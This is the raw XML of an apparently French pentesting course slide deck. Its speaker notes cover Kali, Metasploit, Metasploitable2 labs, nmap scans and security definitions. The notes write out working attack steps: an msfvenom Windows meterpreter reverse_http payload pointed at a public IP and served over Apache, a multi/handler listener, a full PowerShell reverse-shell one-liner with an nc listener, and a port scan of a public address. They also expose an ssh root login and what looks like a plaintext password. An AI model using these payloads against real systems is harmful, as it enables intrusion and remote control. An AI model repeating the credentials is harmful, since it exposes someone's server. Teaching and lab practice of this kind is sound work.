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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="379" r:id="rId2"/>
    <p:sldId id="324" r:id="rId3"/>
    <p:sldId id="302" r:id="rId4"/>
    <p:sldId id="329" r:id="rId5"/>
    <p:sldId id="330" r:id="rId6"/>
    <p:sldId id="308" r:id="rId7"/>
    <p:sldId id="323" r:id="rId8"/>
    <p:sldId id="334" r:id="rId9"/>
    <p:sldId id="335" r:id="rId10"/>
    <p:sldId id="336" r:id="rId11"/>
    <p:sldId id="337" r:id="rId12"/>
    <p:sldId id="338" r:id="rId13"/>
    <p:sldId id="339" r:id="rId14"/>
    <p:sldId id="304" r:id="rId15"/>
    <p:sldId id="369" r:id="rId16"/>
    <p:sldId id="306" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="307" r:id="rId19"/>
    <p:sldId id="370" r:id="rId20"/>
    <p:sldId id="381" r:id="rId21"/>
    <p:sldId id="380" r:id="rId22"/>
    <p:sldId id="315" r:id="rId23"/>
    <p:sldId id="319" r:id="rId24"/>
    <p:sldId id="371" r:id="rId25"/>
    <p:sldId id="309" r:id="rId26"/>
    <p:sldId id="340" r:id="rId27"/>
    <p:sldId id="312" r:id="rId28"/>
    <p:sldId id="322" r:id="rId29"/>
    <p:sldId id="314" r:id="rId30"/>
    <p:sldId id="327" r:id="rId31"/>
    <p:sldId id="341" r:id="rId32"/>
    <p:sldId id="342" r:id="rId33"/>
    <p:sldId id="326" r:id="rId34"/>
    <p:sldId id="372" r:id="rId35"/>
    <p:sldId id="332" r:id="rId36"/>
    <p:sldId id="333" r:id="rId37"/>
    <p:sldId id="373" r:id="rId38"/>
    <p:sldId id="374" r:id="rId39"/>
    <p:sldId id="375" r:id="rId40"/>
    <p:sldId id="376" r:id="rId41"/>
    <p:sldId id="377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78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36257" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="41" d="100"/>
          <a:sy n="41" d="100"/>
        </p:scale>
        <p:origin x="3618" y="5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lilinux.fr/commandes/metasploit-sur-kali-linux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vshells.com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SQRIkSj-6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Zj_7Wunnu2w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agit.fr/definition/Antivirus-anti-malware" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/UBA%20(User%20Behavior%20analytics)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emagit.fr/definition/Chiffrement" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/Systeme-de-detection-dintrusions" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/Pare-feu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%C3%A9curit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Exploit_(informatique)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Correctif" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_zero-day#cite_note-GDT-1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Q3oLeY3ugbAO5LsDQij6mY3om5BJVsN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www.kali.org/tools/metasploit-framework/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.kali.org/docs/tools/starting-metasploit-framework-in-kali/#quick-way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>www.kalilinux.fr/commandes/metasploit-sur-kali-linux/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25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981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KALI :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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ssh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root@194.195.210.128</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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Lamp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$$205909$$@@voiture_maison_toillette</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A73E8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.kalilinux.fr/commandes/metasploit-sur-kali-linux/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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apt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update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apt-get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install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metasploit-framework</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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msfconsole</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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show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payloads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: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use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auxiliary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/scanner/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portscan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tcp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SCAN : 45.79.211.212</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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show options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set ports 80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set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rhosts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45.79.211.212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run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ou exploit</a:t>
            </a:r>
          </a:p>
          <a:p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---------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p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apt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install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apache2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cd /var/www/html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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msfvenom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-p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windows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meterpreter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reverse_http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-a x86 --platform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windows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-f exe LHOST=194.195.210.128 LPORT=80 -o something32.exe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chmod 777 something32.exe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service apache2 start</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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download</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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service apache2 stop</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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msfconsole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use exploit/multi/handler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set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payload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windows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meterpreter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reverse_http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set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lhost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194.195.210.128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set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lport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80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set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exitonsession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false</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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set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exitonsession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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true</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR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run -j –z</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR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double clic :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR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affiche session</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR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sessions 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022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499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68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www.exploit-db.com/exploits/52067</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.exploit-db.com/search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.exploit-db.com/exploits/52075</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.exploit-db.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.exploit-db.com/google-hacking-database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19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" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Liens 1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" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=ujpscX1KB5M</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Liens 2 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.revshells.com/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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>noni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bypass -c "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Net.Sockets.TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(‘192.168.19.134', 9001);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>TCPClient.GetStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>();$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>IO.StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>);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WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ($String) {[byte[]]$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>script:Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = 0..$TCPClient.ReceiveBufferSize | % {0};$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($String + 'SHELL&gt; ');$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>()}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> '';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($Buffer, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Buffer.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)) -gt 0) {$Command = ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>text.encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]::UTF8).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>GetString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($Buffer, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - 1);$Output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-Expression $Command 2&gt;&amp;1 | Out-String} catch {$_ | Out-String}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ($Output)}$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>()" 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Machine kali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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –v –l –p 9001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 9001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539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https://westoahu.hawaii.edu/cyber/forensics-weekly-executive-summmaries/8424-2/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Ou </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-i.html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Irc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> backdoor : https://www.hackingloops.com/metasploitable-2/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927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3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=9SQRIkSj-6g</a:t>
            </a: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rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=Zj_7Wunnu2w</a:t>
            </a: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64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https://medium.com/@habibsemouma/setting-up-metasploitable2-and-kali-in-docker-for-pentesting-6b71a089c4a2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/tleemcjr/metasploitable2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>https://www.youtube.com/watch?v=RxGkG8HFFHs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33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Phase reconnaissance : analyse d’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Phase exploitation : attaque proprement dit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>experience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et connaissance des noms d’attaques ou exploit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les CVE – les hackers opportunistes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>days</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  - La veille au zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>days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Phase post-exploitation : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> esc (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> pour s’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>integrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>noyeau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>LoL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : Living of land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Pivoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Backdooring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260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864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026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Une plateforme de protection des terminaux (ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="1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Endpoint Protection Platform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EPP) est une technologie de sécurité qui protège les dispositifs terminaux (serveurs et postes de travail, notamment, tels que les ordinateurs de bureau et ordinateurs portables).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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Une EPP combine plusieurs technologies de protection des terminaux en un système de sécurité consolidé. Les EPP incluent généralement des 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3"/>
              </a:rPr>
              <a:t>antimalwares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des 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4"/>
              </a:rPr>
              <a:t>pare-feu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des systèmes de prévention des intrusions (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5"/>
              </a:rPr>
              <a:t>IDS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), le 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6"/>
              </a:rPr>
              <a:t>chiffrement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des données et l’analyse comportementale (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D73AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>UEBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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). Ces capacités permettent de surveiller, contrôler et sécuriser les terminaux sur l’ensemble du réseau d’une organisation.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311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Dans le domaine de la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Sécurité informatique"/>
              </a:rPr>
              <a:t>sécurité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une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également orthographiée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0-day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ou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 du jour zéro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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4"/>
              </a:rPr>
              <a:t>1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 tooltip="Vulnérabilité informatique"/>
              </a:rPr>
              <a:t>vulnérabilité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n'ayant fait l'objet d'aucune publication ou n'ayant aucun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 tooltip="Correctif"/>
              </a:rPr>
              <a:t>correctif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connu. L'existence d'une telle faille sur un produit informatique implique qu'aucune protection n'existe, qu'elle soit palliative ou définitive.</a:t>
            </a:r>
          </a:p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terminologie « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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» ne qualifie pas la gravité de la faille. Comme toute vulnérabilité, sa gravité dépend de l'importance des dégâts pouvant être occasionnés, et de l'existence d'un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 tooltip="Exploit (informatique)"/>
              </a:rPr>
              <a:t>exploit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c'est-à-dire d'une technique « exploitant » cette faille afin de conduire des actions indésirables sur le produit concerné.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944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772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601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849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E9FC-3B73-1F6E-05FC-E5EF3549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AF614D-49EC-C05B-632A-F3AD3C6AB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2752318-0346-BCBB-1058-0307B8266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18C5BD-FF6D-C3A8-531A-DA5421C90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603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61511-77B3-2B6A-DB8A-79D08D3FF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AAFBD3-EEF4-7A0E-434D-FC27425FF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4B0D2D1-28D2-5160-FFE6-6B499C30B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F76C3-7C3C-9471-8141-86B3A23FD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348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10D8-BDBE-6A1C-AC97-80A7C622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CD9222-9547-5802-5231-84683EAE2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8A36A0-BDF0-6ACC-1C15-83AC34C4D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315350-3C8E-F89B-1F7A-A7D4A7B77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5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635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9DE7-5FE5-6D39-5EDD-EA24F0C6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528BB8-B958-C50A-3305-F1001B243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726ED3-F8ED-4EC3-4153-0789481A8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3CB3F2-EE5D-A2C5-3C08-66A746969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9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70C4-B50B-3FD8-B360-5854482B3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96C2CC-1723-D09C-4103-1EA370FC7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F90FDA-6807-57C9-D78D-DD947CA9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7422DB-7058-6DDA-D496-12FD460C2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39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24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871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545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https://www.hackerprof.com/80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5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https://www.youtube.com/watch?v=4t4kBkMsDbQ&amp;pp=ygUTbmV0d29ya2NodWNrICsgbm1hcA%3D%3D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Kit : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Nscan</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Zmap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Masscan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Ping : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ping 10.7.1.226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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Finding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> host and scanning network </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>learning.oreilly.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ceh-certified-ethical</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1. check for live </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>systems</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/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sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2. check for open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(port 80, 443 for web)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sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -p 80,443 10.7.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>T : for TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 3-way handshake (Full Open scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>message 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>i'm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 443 Are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theire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (SYN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>message 2 : yes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>i'm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>thiere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, (SYN ACK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>message 3 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>let's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> talk (ACK)</a:t>
            </a:r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detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by the IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3-way handshake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sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -p 80,443 10.7.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
